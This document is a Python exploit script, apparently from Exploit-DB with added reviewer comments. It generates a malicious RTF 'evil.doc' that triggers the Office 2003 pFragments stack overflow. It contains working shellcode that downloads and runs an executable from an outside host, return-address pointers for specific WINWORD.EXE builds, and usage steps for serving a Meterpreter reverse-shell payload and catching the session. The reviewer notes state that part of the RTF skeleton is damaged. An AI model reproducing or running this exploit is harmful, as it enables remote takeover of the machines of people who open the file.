Microsoft Office 2003 Home/Pro Buffer Overflow (RTF pFragments; per the Exploit-DB note below, likely the same bug as MS10-087)
Posted on 10 January 2012
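#!/usr/bin/python
#
# Note from the Exploit-DB team: this might be the same bug as
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
# (the Metasploit module for MS10-087 / CVE-2010-3333, the RTF "pFragments"
# shape-property stack overflow) - so treat the "0day" label with caution.
#
# -----------------------------------------------------------------------------
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1, SP2, SP3
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges)
# Greetings: offsec, corelan, setoolkit
# -----------------------------------------------------------------------------
# Usage, as documented by the authors:
#   (1) ./office2003.py                -> writes evil.doc; copy it to the web root
#   (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 \
#           LPORT=9988 X > /var/www/magic.exe
#   (3) msf exploit(handler) > exploit -> start the reverse handler on 9988
#   Opening evil.doc on the victim downloads magic.exe over HTTP and runs it;
#   the authors' transcript shows a Meterpreter session from 192.168.111.128
#   back to 192.168.111.132:9988.
#
# Reviewer notes on this listing:
#   * The published copy of the script had lost every backslash: the shellcode
#     and pointer strings read "x65x62..." instead of "\x65\x62...".  Each of
#     those escapes encodes an ASCII hex digit (the pFragments payload is hex
#     text - compare the binascii.b2a_hex(URL) of the original), so they are
#     restored below as plain hex strings carrying the identical bytes.
#   * The RTF skeleton (RTF_PREFIX) was damaged the same way and cannot be
#     restored with certainty; it is kept as published and flagged below.
#   * The output is RTF text saved under a .doc name; an "{\rt" prefix in a
#     .doc file is a cheap detection signature for this family of samples.
#   * The second stage is fetched over plain HTTP with no integrity check:
#     whoever controls the URL's host controls what runs on the victim.
# -----------------------------------------------------------------------------
import binascii

FILENAME = "evil.doc"

# URL the shellcode passes to URLDownloadToFileA; must be ASCII.
URL = "http://192.168.111.132/magic.exe"

# -----------------------------------------------------------------------------
# File structure
# -----------------------------------------------------------------------------
# NOTE(review): reproduced byte-for-byte from the published listing, where the
# RTF control-word backslashes appear to have been stripped by the same
# extraction that removed the "\x" prefixes.  It almost certainly read
# "{\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn
# \shpbypara...}{\sp{\sn {}{}{\sn}{\sn}{**}pFragments}{***}{\sv{...}9;2;..."
# in the original (pFragments being the overflowed shape property); check
# against the original Exploit-DB entry before relying on this file.  The
# "\r" in "{\rt" is a Python escape (CR), as it was in the original non-raw
# string literal.
RTF_PREFIX = (
    "{\rt##{shp{sp}}{shp{sp}}{shp{sp}}{shp{*shpinstshpfhdr0shpbxcolumns"
    "hpbyparash pwr2}{sp{sn {}{}{sn}{sn}{**}pFragments}{***}{sv{*****"
    "*********************}9;2;ffffffffff"
)

# -----------------------------------------------------------------------------
# Shellcode ("magic" in the original) as hex text: 460 digits = 230 bytes.
# -----------------------------------------------------------------------------
# Decoded, it is the usual download-and-execute stager: locate kernel32 through
# the PEB loader list (fs:[30h]), resolve APIs by walking the export table with
# a ROR-13 hash, LoadLibraryA("urlmon"), URLDownloadToFileA(NULL, <URL>,
# "a.exe", 0, NULL), WinExec("cmd.exe /c  a.exe", 1), ExitProcess.  The URL is
# found by call/pop: edi is set to the byte immediately after these 230 bytes,
# which is why build_document() appends hex(URL) + "00" directly after them.
# "a.exe" is a relative path (the authors describe it as the parent directory).
# Because the payload is downloaded rather than embedded there are no size or
# bad-character restrictions on it.
SHELLCODE_HEX = (
    "eb7731c9648b7130"  # jmp to the call/pop stub; find_kernel32 via fs:[30h]
    "8b760c8b761c8b5e"
    "088b7e208b366639"
    "4f1875f2c3608b6c"  # ret; then find_function (export walk, ROR-13 hash)
    "24248b453c8b5405"
    "7801ea8b4a188b5a"
    "2001ebe334498b34"
    "8b01ee31ff31c0fc"
    "ac84c07407c1cf0d"
    "01c7ebf43b7c2428"
    "75e18b5a2401eb66"
    "8b0c4b8b5a1c01eb"
    "8b048b01e8894424"
    "1c61c3e892ffffff"
    "5f81ef98ffffffeb"  # pop edi; edi += 0x68 -> the URL appended after the blob
    "05e8edffffff688e"
    "4e0eec53e894ffff"  # push 0xec0e4e8e (LoadLibraryA hash)
    "ff31c966b96f6e51"
    "6875726c6d54ffd0"  # "urlm" + "on" -> LoadLibraryA("urlmon")
    "68361a2f7050e87a"  # push 0x702f1a36 (URLDownloadToFileA hash)
    "ffffff31c951518d"
    "3781c6eeffffff8d"  # esi = edi - 0x12 -> "cmd.exe /c  a.exe"; edx = esi + 0xc -> "a.exe"
    "560c525751ffd068"
    "98fe8a0e53e85bff"  # push 0x0e8afe98 (WinExec hash)
    "ffff415156ffd068"
    "7ed8e27353e84bff"  # push 0x73e2d87e (ExitProcess hash)
    "ffffffd0636d642e"  # call eax; "cmd."
    "657865202f632020"  # "exe /c  "
    "612e65786500"      # "a.exe\0"
)

# -----------------------------------------------------------------------------
# Pointers to ESP.  Two Office 2003 builds are in circulation and need
# different WINWORD.EXE addresses; select the one matching the target.
# -----------------------------------------------------------------------------
# (1) Standalone build:  0x30324366  CALL ESP         in WINWORD.EXE
#     http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe
# (2) Service Pack upgrade (Office 2003 SP3 full-file update):
#                        0x30402655  PUSH ESP ; RETN  in WINWORD.EXE
#     http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe
# Both are absolute image addresses, stored as hex text of the little-endian
# dword; they only hold while WINWORD.EXE loads at its preferred base (no
# ASLR on XP, which is what the authors tested on).
EIP_CALL_ESP = "66433230"      # 0x30324366, build (1)
EIP_PUSH_ESP_RET = "55264030"  # 0x30402655, build (2)
EIP = EIP_CALL_ESP

# Bytes following the return address: 0x7c800000 twice (hex text "0000807c";
# presumably kernel32's usual XP base, the authors do not say), 24 'A'
# characters, then 18 NOP bytes.  Kept exactly as published.
FILLER = "0000807c" * 2 + "A" * 24 + "90" * 18


def build_document(url=URL, eip=EIP):
    """Return the contents of the malicious document as a str.

    url: ASCII URL the shellcode downloads to "a.exe" and runs; it is appended
         to the shellcode as hex text followed by a "00" terminator.
    eip: hex text of the little-endian pointer written over the return
         address (EIP_CALL_ESP or EIP_PUSH_ESP_RET).
    Raises UnicodeEncodeError if *url* is not pure ASCII.
    """
    # Overflowing pFragments record: 501 '#' then "05" and 40 '0' up to the
    # saved return address, then the pointer, filler and shellcode.  The
    # layout is reproduced as published.
    overflow = "#" * 501 + "05" + "0" * 40 + eip + FILLER + SHELLCODE_HEX
    # NUL-terminated URL as hex text, read by the shellcode from right after
    # its own 230 bytes.
    url_hex = binascii.hexlify(url.encode("ascii")).decode("ascii")
    trailer = "{}}}}}}" + "\r\n" + "}"
    return RTF_PREFIX + overflow + url_hex + "00" + trailer


def write_document(path=FILENAME, url=URL, eip=EIP):
    """Write build_document(url, eip) to *path* and return the byte count.

    Binary mode keeps the embedded CR/LF bytes exactly as built on every
    platform; the original wrote in text mode, which is byte-exact only on
    Unix.
    """
    data = build_document(url, eip).encode("latin-1")
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


def main():
    """Script entry point: generate FILENAME in the current directory."""
    count = write_document()
    print("[*] wrote %s (%d bytes)" % (FILENAME, count))


if __name__ == "__main__":
    main()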
